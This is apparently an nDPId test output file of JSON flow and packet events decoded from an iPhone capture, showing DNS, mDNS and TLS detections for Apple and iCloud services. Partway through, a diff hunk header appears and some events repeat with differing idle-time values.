00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598252,"flow_last_seen":1582454598252,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598252,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1582454598252,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598252,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGrHrAqAIREfi5jMWPAbsN6rbUAAAAALDC\/\/8jQQAAAgQFtAEDAwcBAQgKEd\/m0wAAAAAEAgAA"}
00676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"iphone.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1582454598287,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1582454598287,"pkt":"xGGLNYKpxiwDYGpkCABFAADPyCcAAEARLJTAqAIBwKgCEQA1xz8Au1lGYEOBgAABAAUAAAAAB2NhcHRpdmUFYXBwbGUDY29tAAABAAHADAAFAAEAABGWACoMY2FwdGl2ZS1jaWRyDG9yaWdpbi1hcHBsZQNjb20GYWthZG5zA25ldADALwAFAAEAAAC8AA4LY2FwdGl2ZS1jZG7APMBlAAUAAQAAAOYAFAdjYXB0aXZlAWcHYWFwbGltZ8AawH8AAQABAAAAEQAEEf1pysB\/AAEAAQAAABEABBH9Nco="}
00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"iphone.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598246,"flow_last_seen":1582454598287,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1582454598287,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":51007,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"ConnCheck"},"dns": {"query":"captive.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.253.105.202"}}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"iphone.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598373,"flow_last_seen":1582454598373,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454598373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55457,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -89,51 +89,51 @@
00522{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"iphone.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1582454598373,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":108,"pkt_l4_len":74,"thread_ts_msec":1582454598373,"pkt":"AQBeAAD7xGGLNYKpCABFAABemlUAAP8RfYTAqAIR4AAA+xTpFOkASu+LAAAAAAABAAAAAAABCF9ob21la2l0BF90Y3AFbG9jYWwAAAyAAQAAKQWgAAARlAASAAQADgAA5mGLNYKpxGGLNYKp"}
00677{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"iphone.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598373,"flow_last_seen":1582454598373,"flow_idle_time":180000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1582454598373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_homekit._tcp.local"}}
00555{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"iphone.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1582454598373,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":128,"pkt_l4_len":74,"thread_ts_msec":1582454598373,"pkt":"MzMAAAD7xGGLNYKpht1gD8z1AEoR\/\/6AAAAAAAAACCM\/F4KYopz\/AgAAAAAAAAAAAAAAAAD7FOkU6QBKKFMAAAAAAAEAAAAAAAEIX2hvbWVraXQEX3RjcAVsb2NhbAAADIABAAApBaAAABGUABIABAAOAADmYYs1gqnEYYs1gqk="}
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598377,"flow_last_seen":1582454598377,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598377,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1582454598377,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598377,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG\/2TAqAIRX2UZNcWQAbugppinAAAAALDC\/\/8BIgAAAgQFtAEDAwcBAQgKEd\/nTAAAAAAEAgAA"}
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598385,"flow_last_seen":1582454598385,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598385,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1582454598385,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598385,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGZE\/AqAIREYICLsWRAbsZOusXAAAAALDC\/\/+bAAAAAgQFtAEDAwcBAQgKEd\/nUwAAAAAEAgAA"}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598387,"flow_last_seen":1582454598387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598387,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":49152,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1582454598387,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598387,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG\/DfAqAIREf1pysAAAFAslesxAAAAALDC\/\/8mdwAAAgQFtAEDAwYBAQgKEd\/nTQAAAAAEAgAA"}
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1582454598402,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598402,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADEG+34R+LmMwKgCEQG7xY+mDHMKDeq21aBScSAX2QAAAgQFrAEBCAr26Z7FEd\/m0wEDAwU="}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1582454598404,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598404,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGrIbAqAIREfi5jMWPAbsN6rbVpgxzC4AQBAuwVwAAAQEIChHf52v26Z7F"}
00919{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598252,"flow_last_seen":1582454598405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598405,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-fmfmobile.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1582454598412,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598412,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGSmlfZRk1wKgCEQG7xZCMPaCSoKaYqKBScSBNPAAAAgQFrAQCCAoi0AShEd\/nTAEDAwc="}
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598377,"flow_last_seen":1582454598377,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598377,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1582454598377,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598377,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG\/2TAqAIRX2UZNcWQAbugppinAAAAALDC\/\/8BIgAAAgQFtAEDAwcBAQgKEd\/nTAAAAAAEAgAA"}
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598385,"flow_last_seen":1582454598385,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598385,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1582454598385,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598385,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGZE\/AqAIREYICLsWRAbsZOusXAAAAALDC\/\/+bAAAAAgQFtAEDAwcBAQgKEd\/nUwAAAAAEAgAA"}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598387,"flow_last_seen":1582454598387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598387,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":49152,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1582454598387,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598387,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG\/DfAqAIREf1pysAAAFAslesxAAAAALDC\/\/8mdwAAAgQFtAEDAwYBAQgKEd\/nTQAAAAAEAgAA"}
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1582454598402,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598402,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADEG+34R+LmMwKgCEQG7xY+mDHMKDeq21aBScSAX2QAAAgQFrAEBCAr26Z7FEd\/m0wEDAwU="}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1582454598404,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598404,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGrIbAqAIREfi5jMWPAbsN6rbVpgxzC4AQBAuwVwAAAQEIChHf52v26Z7F"}
00919{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598252,"flow_last_seen":1582454598405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598405,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-fmfmobile.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1582454598412,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598412,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGSmlfZRk1wKgCEQG7xZCMPaCSoKaYqKBScSBNPAAAAgQFrAQCCAoi0AShEd\/nTAEDAwc="}
00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"iphone.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1582454598412,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1582454598412,"pkt":"xGGLNYKpxiwDYGpkCABFAADIRW8AAEARr1PAqAIBwKgCEQA12KEAtAJjFxuBgAABAAUAAAAABG1lc3UFYXBwbGUDY29tAAABAAHADAAFAAEAAAfrAB8IbWVzdS1jZG4FYXBwbGUDY29tBmFrYWRucwNuZXQAwCwABQABAAAMoAAYCG1lc3UtY2RuDG9yaWdpbi1hcHBsZcA7wFcABQABAAAARAARBG1lc3UBZwdhYXBsaW1nwBfAewABAAEAAAAPAAQR\/WnKwHsAAQABAAAADwAEEf01yw=="}
00778{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":70,"source":"iphone.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598373,"flow_last_seen":1582454598412,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1582454598412,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55457,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"mesu.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.253.105.202"}}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1582454598413,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598413,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG\/3DAqAIRX2UZNcWQAbugppiojD2gk4AQBAvpMwAAAQEIChHf524i0ASh"}
00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598377,"flow_last_seen":1582454598414,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598414,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gspe35-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598416,"flow_last_seen":1582454598416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598416,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1582454598416,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598416,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG\/DfAqAIREf1pysWSAbt\/OqmMAAAAALDC\/\/8OTwAAAgQFtAEDAwcBAQgKEd\/ndwAAAAAEAgAA"}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598418,"flow_last_seen":1582454598418,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598418,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1582454598418,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598418,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG\/DfAqAIREf1pysWTAbsyJO8VAAAAALDC\/\/8V2QAAAgQFtAEDAwcBAQgKEd\/neQAAAAAEAgAA"}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1582454598426,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598426,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADIGSjwR\/WnKwKgCEQBQwACbtSzNLJXrMqBScNC85AAAAgQFrAQCCAodNCSFEd\/nTQEDAwg="}
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1582454598427,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598427,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADIGslMRggIuwKgCEQG7xZHfrwWiGTrrGKBSqbCWRAAAAgQFrAQCCAq1T9HeEd\/nUwEDAw4="}
00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":78,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598377,"flow_last_seen":1582454598449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598449,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"gspe35-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1582454598453,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598453,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADIGSjwR\/WnKwKgCEQG7xZNpWNRgMiTvFqBScNC35wAAAgQFrAQCCAoAH8DDEd\/neQEDAwg="}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1582454598459,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598459,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADIGSjwR\/WnKwKgCEQG7xZLy+qnpfzqpjaBScNDegAAAAgQFrAQCCAqK\/qiVEd\/ndwEDAwg="}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1582454598413,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598413,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG\/3DAqAIRX2UZNcWQAbugppiojD2gk4AQBAvpMwAAAQEIChHf524i0ASh"}
